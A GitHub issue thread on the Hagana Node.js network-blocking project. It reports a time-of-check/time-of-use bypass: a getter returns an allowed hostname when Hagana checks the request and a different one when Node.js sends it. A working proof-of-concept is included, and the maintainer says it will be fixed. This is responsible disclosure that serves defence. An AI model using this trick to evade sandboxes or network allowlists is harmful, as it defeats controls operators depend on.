### ISSUE TITLE
Time of check / Time of use HTTP(S) bypass

### ISSUE THREAD

**Issue by Mickael-van-der-Beek** [yaakov123/hagana#6]
I found another break out strategy regarding the network block.

This one is a bit different and doesn't directly bypass the Hagana checks by using an obscure API but simply adds a getter that returns a different `hostname` value depending on how many time the value was read.

The first time, the value is read by Hagana to check if it's allowed and the "safe" hostname will be returned.
The second time, the value is read by Node.js core logic and the "unsafe" hostname will be returned.

e.g:

```
import http from 'http';

export function run () {
  return new Promise((resolve, reject) => {
    const chunks = [];

    let counter = 0;
    const options = {
      get hostname () {
        counter += 1;

        if (counter === 1) {
          return 'httpbin.org'
        } else {
          return 'example.com'
        }
      }
    };

    const req = http.request(
      options,
      res => {
        res.on('data', chunk => chunks.push(chunk));

        res.once('end', () => {
          console.log('RESPONSE=', Buffer.concat(chunks).toString());
          resolve();
        });  
      }
    );

    req.once('error', reject);

    req.end();
  });
}
```

**Comment by yaakov123** [comment]
This is a tough one. I'll need to give it some thought...

_P.S.  I'm happy to collaborate with you on this project if you're interested :)_

**Comment by Mickael-van-der-Beek** [comment]
@yaakov123 I'm pretty busy but if you want to talk about your approach to Hagana and the different break out strategies we can do that sure. :)

**Comment by yaakov123** [comment]
I'm going to be away from the computer of the weekend, but let's discuss sometime next week. Send me a DM and we'll arrange something - https://twitter.com/JacobBeckerman

**Comment by yaakov123** [comment]
This will be fixed in v0.0.15
